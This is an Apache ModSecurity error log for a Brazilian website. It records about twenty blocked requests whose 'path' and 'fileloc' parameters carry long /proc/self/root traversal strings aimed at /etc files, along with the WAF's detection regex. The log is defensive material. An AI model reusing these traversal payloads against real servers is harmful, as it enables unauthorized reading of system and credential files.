[Fri Mar 20 03:50:09.879223 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:50738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuIRCii7xarUs8iHY0xgAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:12.828662 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:50612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuJNa6ubjKNq_cu4afQwAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:15.259053 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:50624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuJxCii7xarUs8iHY02AAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:16.579160 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:50626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuKPqxLDW4GITHUkSynAAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:20.079097 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:50632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuLNa6ubjKNq_cu4afSgAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:21.965296 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:49756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuLV1pVZ5mVmJwsFMCPAAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:23.306579 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.243.128:49760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuL_qxLDW4GITHUkSypwAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:24.683692 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:49772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuMOoXxyEfFpUF8f9UhQAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:26.038410 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:49778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuMvXLqtnMIWvjpaJpoAAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:27.335071 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.243.128:49790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuM_HIg5MgXLBnicPMOwAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:28.618681 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:49798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuNPHIg5MgXLBnicPMPQAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:33.015334 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.243.128:41816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuObninkcc-iUj5AougAAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:35.429603 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.243.128:41830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuOwF0L0L-SsrnPo44-QAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:36.094481 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.241.31:43830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuPLninkcc-iUj5AougwAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:50:37.472727 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.241.31:46708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuPTJ3M9BSuKP7CAbg9QAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:49.627794 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:41840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuSTJ3M9BSuKP7CAbhDAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:50:51.432962 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:50860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuShCii7xarUs8iHY1AgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:51:00.379680 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.241.31:46722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuVDJ3M9BSuKP7CAbhJgAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:51:54.652824 2026] [:error] [pid 11167:tid 140411741927168] [client 74.7.241.31:44346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuivHIg5MgXLBnicPMhQAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:51:55.950303 2026] [:error] [pid 7893:tid 140411683178240] [client 74.7.241.31:46754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzuixCii7xarUs8iHY1VQAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:52:02.511689 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:46696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzukuoXxyEfFpUF8f9UvAAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
